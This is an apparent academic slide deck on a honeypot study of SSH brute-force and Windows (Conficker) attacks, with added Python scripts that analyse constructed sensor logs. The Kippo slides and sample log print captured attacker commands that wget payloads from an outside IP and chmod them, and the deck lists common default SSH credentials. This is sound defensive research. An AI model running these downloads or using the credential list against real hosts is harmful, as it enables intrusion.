
Study of Internet Threats and Attacks Methods Using Honeypots and Honeynets

Tomas Sochor & Matej Zuzcak
University of Ostrava
Department of Informatics and Computers

Presentation Contents
1. Introduction.
2. Honeypot and honeynet classification.
3. Research methods.
4. Sensors used for the study.
5. Honeynet topology.
6. Results:
   – Linux SSH shell emulation (Kippo),
   – Windows emulation (Dionaea).
7. Comparison of sensor attractiveness.
8. Conclusions.

Honeypot and Honeynet Classification
• Honeypot (L. Spitzner, 2003): a security resource that serves as a "lure" for attackers:
  – it attracts attacks,
  – captured attacks can be analyzed in detail.
• Basic classification based on activity:
  – passive (server honeypots),
  – active (client honeypots).
• Basic classification according to the level of interaction:
  – low/(medium)-interaction honeypots,
  – high-interaction honeypots.

Honeypot and Honeynet Classification
• According to the production view (important classification):
  – Production honeypots
    • Shadow honeypots
  – Research honeypots

Honeypot Purpose
• Obtaining information about:
  – the most widespread threats or attacks in our area,
  – new threats and attacks.
• Why is it important?
  – Improve detection and defence.
  – "Keep up with the attackers..."
  – Comparing the attractiveness of different networks for attackers, and current trends.
  – Detection of potential new threats.

Honeynet Classification
• Honeynet = (logical) network of several honeypots:
  – either connected to a single physical network,
  – or to multiple networks interconnected via the Internet.

Honeypot Projects - Current State
• Honeypot results are seldom published.
• Published data:
  – few details,
  – often outdated,
  – further, more detailed analysis is not possible.
• Numerous closed-community honeypots:
  – data can be shared only among members.
• National and European institutions (CERT and CSIRT teams, ENISA):
  – research and data collection run by private bodies,
  – mostly in non-public mode (e.g. armed forces).
• Only a few projects are publicly available:
  – most of them are not focused primarily on honeypots,
  – some projects publish elementary statistical output, e.g. DenyHosts, DShield.org.

Study Research Methods
• Low-interaction honeynet:
  – Windows honeypot sensor – Dionaea:
    • emulation of specific protocols and their vulnerabilities (SMB on port 445, HTTP, MSSQL, MySQL, FTP),
    • primary goal is to capture and analyze binary files (malware).
  – Linux honeypot sensor – Kippo:
    • emulation of an SSH shell (network port 22),
    • primary goal is to monitor the activities of an attacker who is remotely connected to the system.

Low-interaction Honeynet Topology

Distribution and Implementation of Sensors
• Low-interaction sensors (ČR = Czech Republic, SR = Slovakia):
  – Dionaea: OSU (ČR), VPS Prague (ČR), Kysucké Nové mesto (SR),
  – Kippo: VPS Prague (ČR).
• Modifications of the Dionaea and Kippo implementations:
  – malware identification (sample hashes) propagated into a central database.
• Evaluating data:
  – analysis of the data,
  – comparison of results among sensors,
  – sensors' attractiveness in academic networks is low – almost insufficient.

Dionaea honeypot sensor – OSU, CESNET
Number of all connections in the direction to the honeypot during one day: (chart)
Downloaded files during one day: (chart)

Dionaea honeypot sensor – VPS Praha
Number of all connections in the direction to the honeypot during one day: (chart)
Downloaded files during one day: (chart)

Dionaea honeypot sensor – SR, SANET
Number of all connections in the direction to the honeypot during one day: (chart)
Downloaded files during one day: (chart)

(All charts span 1.11.2013 – 1.3.2014. Annotations recovered from the charts, mean x̄ and standard deviation s of the daily count: x̄ = 2125.11; x̄ = 789.62; x̄ = 241.90; x̄ = 69064.48, s = 28635.48; x̄ = 0.15. The extraction does not preserve which annotation belongs to which chart.)

Dionaea – Windows attacks analysis
The 10 most active IP addresses for the period under review: (table not reproduced)

Dionaea – Windows attacks analysis
• Number of unique samples (by MD5): 1440
• Number of unknown samples (according to VirusTotal.com): 16
• Conficker network worm:
  – the most frequently spread threat captured: 99.99933% of all malware,
  – remote code execution via an RPC buffer overflow (the Server service vulnerability, MS08-067),
  – originated Nov. 2008!
  – lots of new polymorphic variants.

Operating system    Number of connections
Windows                       9 123 795
Unknown                         114 928
Linux                             4 736
SunOS                               454

Local port    Number of accepted connections
445                              9 141 640
80                                  26 604
1433                                15 645
3306                                11 552
21                                   7 300

Captured Conficker variants (AV labels):
Win32/Conficker.AA
Win32/Conficker.AE
Win32/Conficker.AL
Win32/Conficker.X
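As an added example (not the authors' code), the following Python script computes the three kinds of figures the Dionaea slides above report: connections per local port, unique samples by MD5 with an "unknown" count against a reference set, and the per-day mean x̄ and standard deviation s of inbound connections. The two SQLite tables are a reduced model loosely based on Dionaea's SQL logging; the table and column names are assumptions, and every row is constructed sample data, not sensor output.

```python
"""Per-sensor statistics of the kind the study reports for Dionaea.

Added example, not the authors' code. The schema is an assumed, reduced
model of Dionaea's SQLite logging; all rows are constructed sample data.
"""
import hashlib
import sqlite3
import statistics
from collections import Counter

DAY = 86400
T0 = 1383264000  # 2013-11-01 00:00:00 UTC, start of the constructed period

SCHEMA = """
CREATE TABLE connections (
    connection           INTEGER PRIMARY KEY,
    connection_type      TEXT,     -- 'accept' = inbound, 'connect' = outbound
    connection_timestamp INTEGER,  -- unix time
    local_port           INTEGER,
    remote_host          TEXT
);
CREATE TABLE downloads (
    download          INTEGER PRIMARY KEY,
    connection        INTEGER REFERENCES connections(connection),
    download_url      TEXT,
    download_md5_hash TEXT
);
"""

# Constructed inbound connections: (timestamp, local port, remote IP).
SAMPLE_CONNECTIONS = (
    [(T0 + i * 60, 445, "203.0.113.%d" % (i % 5)) for i in range(40)]            # day 1: 40
    + [(T0 + DAY + i * 60, 445, "198.51.100.7") for i in range(10)]                # day 2: 12
    + [(T0 + DAY + 5000, 1433, "198.51.100.8"), (T0 + DAY + 6000, 80, "198.51.100.9")]
    + [(T0 + 2 * DAY + i * 30, 445, "192.0.2.%d" % (i + 1)) for i in range(25)]   # day 3: 25
)

# Constructed "captured binaries": (connection id, URL, bytes).
# The first two are byte-identical, so they dedupe to a single MD5.
SAMPLE_BINARIES = [
    (1, "http://203.0.113.1/x.exe", b"MZ\x90\x00sample-A"),
    (2, "http://203.0.113.2/x.exe", b"MZ\x90\x00sample-A"),
    (3, "http://198.51.100.7/y.exe", b"MZ\x90\x00sample-B"),
]
# Stand-in for a VirusTotal lookup: hashes that are already known.
KNOWN_MD5S = {hashlib.md5(b"MZ\x90\x00sample-A").hexdigest()}


def build_db():
    """In-memory database populated with the constructed rows above."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    db.executemany(
        "INSERT INTO connections(connection_type, connection_timestamp, local_port, remote_host) "
        "VALUES ('accept', ?, ?, ?)",
        SAMPLE_CONNECTIONS,
    )
    db.executemany(
        "INSERT INTO downloads(connection, download_url, download_md5_hash) VALUES (?, ?, ?)",
        [(conn, url, hashlib.md5(blob).hexdigest()) for conn, url, blob in SAMPLE_BINARIES],
    )
    return db


def connections_per_port(db):
    """Accepted connections per local port (the 'Local port' table on the slide)."""
    rows = db.execute(
        "SELECT local_port, COUNT(*) FROM connections "
        "WHERE connection_type = 'accept' GROUP BY local_port"
    )
    return Counter(dict(rows))


def daily_mean_std(db):
    """Mean and sample standard deviation of inbound connections per day.
    Days inside the period with no traffic count as 0; skipping them would
    bias the mean upwards on a quiet sensor. Needs at least two days."""
    rows = db.execute(
        "SELECT connection_timestamp / ? AS day, COUNT(*) FROM connections "
        "WHERE connection_type = 'accept' GROUP BY day",
        (DAY,),
    )
    per_day = dict(rows)  # integer division in SQLite buckets by UTC day
    counts = [per_day.get(d, 0) for d in range(min(per_day), max(per_day) + 1)]
    return statistics.mean(counts), statistics.stdev(counts)


def unique_samples(db, known_md5s):
    """(unique samples by MD5, samples not in the reference set).
    MD5 is what the sensor stores and is fine as a dedup key, but collisions
    are cheap, so store SHA-256 alongside when sample identity matters."""
    md5s = {row[0] for row in db.execute("SELECT download_md5_hash FROM downloads")}
    return len(md5s), len(md5s - set(known_md5s))


if __name__ == "__main__":
    db = build_db()
    print("connections per port:", connections_per_port(db).most_common())
    print("daily mean / std:", daily_mean_std(db))
    print("unique / unknown samples:", unique_samples(db, KNOWN_MD5S))
```

On the constructed data port 445 dominates exactly as on the slide, and the zero-fill in daily_mean_std is the detail that matters when the same query is run over a months-long period on a sensor that sees nothing on some days.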

Kippo – Linux attack statistics
Number of attempts to connect to the SSH shell during one day: (chart; x̄ = 603.793, s = 280.636)
Number of successful attempts to connect to the SSH shell (login) during one day: (chart; x̄ and s annotation, raw extracted value 877.4792.10)

Kippo – Linux attacks analysis
The 10 top IP addresses with the highest number of connections: (table not reproduced)
Activity of individual countries according to number of connections: (chart not reproduced)
Total number of attempts to connect: 42 061
Number of unique attacker IP addresses: 427

Kippo – attacks analysis
• SSH clients used by attackers: (chart not reproduced)
  – the majority of the activity comes from botnets.

Kippo – Linux attacks analysis
The most common login data:

Name     Password        Count
root     admin             653
root     123456            306
root     Password          119
root     !QAZ@WSX          112
root     -                  96
admin    password           91
root     Abc123             89
root     Password123        89
root     p@ssw0rd           86
admin    passw0rd           85

The most common activities in the emulated system (SSH shell input):
pwd
ls
chmod 0775 .TSm
ls -l
chmod 0775 .Mm2
uname
uname -a
exit
wget http://216.99.158.70:8090/.TSm
wget http://216.99.158.70:8090/.Mm2
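As an added example (not the authors' code), the Python script below extracts from a Kippo text log the figures the Kippo slides above present: most common credential pairs, unique attacker IPs, successful logins, SSH client banners, the command sequence of each session, and the URLs pulled in with wget/curl, which together with the attacker IPs are the raw material for the firewall / IPS blacklist mentioned in the conclusions. The line layout is modelled on Kippo's kippo.log but is an assumption; the log is constructed sample data using RFC 5737 documentation addresses, except the download URL, which is the one shown on the slide.

```python
"""Kippo log statistics: credentials, attacker IPs, client banners, session
commands and download URLs.

Added example, not the authors' code. Line layout modelled on kippo.log
(assumed); the sample log is constructed.
"""
import re
from collections import Counter, defaultdict

# Every Kippo line carries the Twisted context "...HoneyPotTransport,<session>,<ip>".
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\S*) "
    r"\[(?P<ctx>[^\]]*HoneyPotTransport,(?P<sid>\d+),(?P<ip>[\d.]+))\] "
    r"(?P<msg>.*)$"
)
LOGIN_RE = re.compile(r"^login attempt \[(?P<user>[^/]*)/(?P<pw>.*)\] (?P<result>failed|succeeded)$")
CMD_RE = re.compile(r"^CMD: (?P<cmd>.*)$")
VERSION_RE = re.compile(r"^Remote SSH version: (?P<ver>.*)$")
URL_RE = re.compile(r"https?://\S+")

# Constructed log. Kippo accepts whatever password its config names; here root/admin.
SAMPLE_LOG = """\
2014-02-13 10:21:01+0100 [kippo.core.honeypot.HoneyPotTransport,3,203.0.113.5] Remote SSH version: SSH-2.0-libssh-0.1
2014-02-13 10:21:03+0100 [SSHService ssh-userauth on HoneyPotTransport,3,203.0.113.5] login attempt [root/123456] failed
2014-02-13 10:21:05+0100 [SSHService ssh-userauth on HoneyPotTransport,3,203.0.113.5] login attempt [root/admin] succeeded
2014-02-13 10:21:09+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,203.0.113.5] CMD: uname -a
2014-02-13 10:21:12+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,203.0.113.5] CMD: wget http://216.99.158.70:8090/.TSm
2014-02-13 10:21:15+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,203.0.113.5] CMD: chmod 0775 .TSm
2014-02-13 11:02:44+0100 [kippo.core.honeypot.HoneyPotTransport,4,198.51.100.9] Remote SSH version: SSH-2.0-libssh-0.1
2014-02-13 11:02:46+0100 [SSHService ssh-userauth on HoneyPotTransport,4,198.51.100.9] login attempt [root/123456] failed
2014-02-13 11:02:48+0100 [SSHService ssh-userauth on HoneyPotTransport,4,198.51.100.9] login attempt [admin/password] failed
2014-02-13 12:30:00+0100 [kippo.core.honeypot.HoneyPotTransport,5,192.0.2.77] Remote SSH version: SSH-2.0-OpenSSH_6.2
2014-02-13 12:30:02+0100 [SSHService ssh-userauth on HoneyPotTransport,5,192.0.2.77] login attempt [root/123456] failed
2014-02-13 12:30:04+0100 [SSHService ssh-userauth on HoneyPotTransport,5,192.0.2.77] login attempt [root/!QAZ@WSX] failed
"""


def parse_kippo_log(lines):
    """Turn log lines into event dicts; lines without a session context are skipped."""
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        base = {"ts": m["ts"], "session": m["sid"], "ip": m["ip"]}
        msg = m["msg"]
        if (lm := LOGIN_RE.match(msg)):
            events.append({**base, "kind": "login", "user": lm["user"],
                           "password": lm["pw"], "ok": lm["result"] == "succeeded"})
        elif (cm := CMD_RE.match(msg)):
            events.append({**base, "kind": "cmd", "cmd": cm["cmd"]})
        elif (vm := VERSION_RE.match(msg)):
            events.append({**base, "kind": "client", "version": vm["ver"]})
    return events


def top_credentials(events, n=10):
    """(user, password) pairs by frequency: the 'most common login data' table."""
    return Counter((e["user"], e["password"]) for e in events if e["kind"] == "login").most_common(n)


def unique_attacker_ips(events):
    return len({e["ip"] for e in events if e["kind"] == "login"})


def successful_logins(events):
    return [(e["ip"], e["user"], e["password"]) for e in events if e["kind"] == "login" and e["ok"]]


def client_versions(events):
    """Banner counts; one banner recurring across many IPs hints at a botnet."""
    return Counter(e["version"] for e in events if e["kind"] == "client")


def session_commands(events):
    """Commands typed per (ip, session), in order: the attacker's activity."""
    sessions = defaultdict(list)
    for e in events:
        if e["kind"] == "cmd":
            sessions[(e["ip"], e["session"])].append(e["cmd"])
    return dict(sessions)


def download_urls(events):
    """URLs fetched with wget/curl inside the emulated shell (malware drop sites)."""
    urls = set()
    for e in events:
        if e["kind"] == "cmd" and e["cmd"].split()[:1] in (["wget"], ["curl"]):
            urls.update(URL_RE.findall(e["cmd"]))
    return urls


def blocklist(events):
    """Attacker IPs that attempted a login, sorted for a firewall / IPS feed."""
    return sorted({e["ip"] for e in events if e["kind"] == "login"})


if __name__ == "__main__":
    ev = parse_kippo_log(SAMPLE_LOG.splitlines())
    print(top_credentials(ev), unique_attacker_ips(ev), successful_logins(ev))
    print(client_versions(ev), session_commands(ev), download_urls(ev), blocklist(ev))
```

Only events that carry a session context are counted, so noise such as daemon start-up lines never reaches the statistics, and the blocklist is built from login attempts rather than bare TCP connects, which keeps port scanners that never authenticate out of the feed.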

Low-interaction honeynet - conclusions
• Comparison with other studies is difficult.
• Results comparison:
  – in rough accordance with CZ-NIC and CERT-PL.
• Indifferent approach to installing security updates (a worm from 2008 still dominates).
• Missing elementary security features and habits (default and trivial SSH passwords).
• Obtaining a detailed statistical overview of current trends in security threats.
• Potential detection of new threats.
• The obtained data can be used for updating and disseminating blacklists for firewalls / IPS systems.

Honeypots and IPv6 protocol
• IPv6 honeypots connected to the Internet are still ineffective:
  – the huge range of IPv6 addresses makes scanning pointless, so a passive honeypot is rarely found,
  – the best way of promoting one: domains of the form ipv6.xxx.xx.
• Honeypot tested in an experimental IPv6 LAN:
  – could be useful for a "dormant" IPv6 network.
• Currently the IPv6 protocol is supported directly only by the Dionaea honeypot implementation.
• IPv6 support in Kippo is probably possible with an external patch.

Conclusion and further research
• Honeypots and honeynets are needed:
  – results indicate the continuous occurrence of old attacks,
  – they provide an overview of current trends, the possibility of detecting new attacks, and further research with the obtained data.
• Future research:
  – at present we focus mainly on high-interaction honeypots,
  – we are planning research with SCADA honeypots,
  – we are expanding our research network of low-interaction honeypots (low-interaction honeynet) to obtain more relevant data,
  – we also want to do deeper research on local networks, and research with client honeypots in the future.

Acknowledgments
• For provided hardware and connection:
  – University of Ostrava, Information Technology Centre
  – Spojena skola v Kysuckom Novom Meste, SK
• For expert consulting:
  – The Honeynet Project, Czech Chapter
  – CZ-NIC

Thanks for your attention

Any questions?

[email protected]@secit.sk